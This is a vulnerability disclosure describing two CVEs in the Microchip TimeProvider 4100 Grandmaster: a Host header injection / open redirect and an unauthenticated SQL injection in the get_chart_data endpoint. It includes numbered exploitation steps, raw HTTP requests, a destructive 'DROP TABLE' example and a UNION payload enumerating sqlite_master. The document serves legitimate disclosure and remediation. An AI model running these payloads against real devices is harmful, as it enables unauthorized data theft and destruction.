CVE-2024-43683: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - URL REDIRECTION TO UNTRUSTED SITE ('Open Redirect') – CWE-601

Proceeding with the analysis of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device, it was possible to identify a Host Header Injection vulnerability.

TimeProvider 4100 Grandmaster Device

The device fails to properly validate the Host header in HTTP GET and POST requests. This allows attackers to craft requests with arbitrary Host values, which the system accepts and processes without verification.

In observed cases, replacing the legitimate Host header with a malicious domain (e.g., pentester.com) results in the device accepting the request and redirecting users to the attacker-controlled domain.

This issue can be exploited to:

• Perform phishing attacks by redirecting users to malicious websites that appear legitimate

• Bypass access controls or URL-based filters in certain environments

• Facilitate cache poisoning or other injection-based attacks

Since the device does not verify that the Host header matches its own hostname or expected domain, it becomes vulnerable to these types of manipulations.

Exploitation Steps

Here’s how an attacker could exploit this vulnerability:

1. Craft an HTTP request (GET or POST) targeting the TimeProvider 4100’s web interface.

2. Replace the Host header with a malicious domain under the attacker’s control—for example: Host: pentester.com

3. Send the request to the device.

4. The device processes the request and redirects the user to the attacker-specified domain.

5. The victim may unknowingly land on a malicious page designed to mimic the legitimate interface or capture credentials.

This redirection can occur in browsers or applications that use absolute URLs based on the Host header, making it particularly dangerous in environments where external links are passed through the device.

The following image shows an example of a request containing a custom Host header owned by a malicious user. It's also possible to verify that the browser automatically redirects to the specified domain:

Request RAW:

GET /dashboard HTTP/1.1
Host: pentester.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

Recommendations:

• Implement strict server-side validation of the Host header against an expected allowlist.

• Reject or log requests with unexpected Host values.

• Ensure any redirections or URL generations use fixed, server-side hostnames rather than user-supplied headers.

• Apply firmware updates once an official patch is made available by Microchip.

Conclusion:

This vulnerability highlights a common but serious oversight: trusting user-supplied HTTP headers without validation. Host header injection can be leveraged for phishing, redirection, and other malicious activities—all without requiring access or authentication.

Reporting Information:

CVE Identifier: CVE-2024-43683

CVSS Score: 6.1
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43683
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-improper-verification-of-host-header

Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

CVE-2024-7801: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - UNAUTHENTICATED SQL INJECTION

Starting a deep analysis of the "TimeProvider 4100 grandmaster" device firmware resulted in a SQL Injection vulnerability, specifically within the get_chart_data web resource. 

The vulnerability arises from the improper handling of the channelId parameter, which is inserted directly into an SQL query (SQLite) without sanitization or validation.

TimeProvider 4100 Grandmaster Device

More critically, the channelId parameter is used to dynamically specify the table name in the SQL FROM clause. This design flaw allows unauthenticated attackers to manipulate the query structure, leading to arbitrary SQL execution on the device.

Successful exploitation could allow a threat actor to:

• Extract sensitive internal data

• Enumerate or alter database contents

• Potentially affect system behavior depending on how data is used by other services

The vulnerability can be exploited remotely and without authentication, significantly increasing the potential risk to exposed devices.

Exploitation Steps

An attacker could exploit this vulnerability using the following approach:

1. Send a crafted HTTP request to the vulnerable get_chart_data web endpoint.

2. Manipulate the channelId parameter to inject SQL syntax that alters the intended query logic.

   • Example: Supplying a payload such as channelId=temperature_data; DROP TABLE logs;-- may result in destructive behavior depending on backend protections.

3. Receive response data containing unintended results or confirmation of executed SQL commands.

An example of a malicious SQL payload is provided below:

SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--

Request RAW:

POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=

1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

# End

Conclusion:

This vulnerability highlights the risks of dynamic query construction without proper input validation. The fact that the flaw is unauthenticated and affects a core web resource significantly elevates the impact and exploitability.

Reporting Information:

CVE Identifier: CVE-2024-7801

CVSS Score: 6.3
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-7801
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection

Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Public exploit: https://www.exploit-db.com/exploits/52122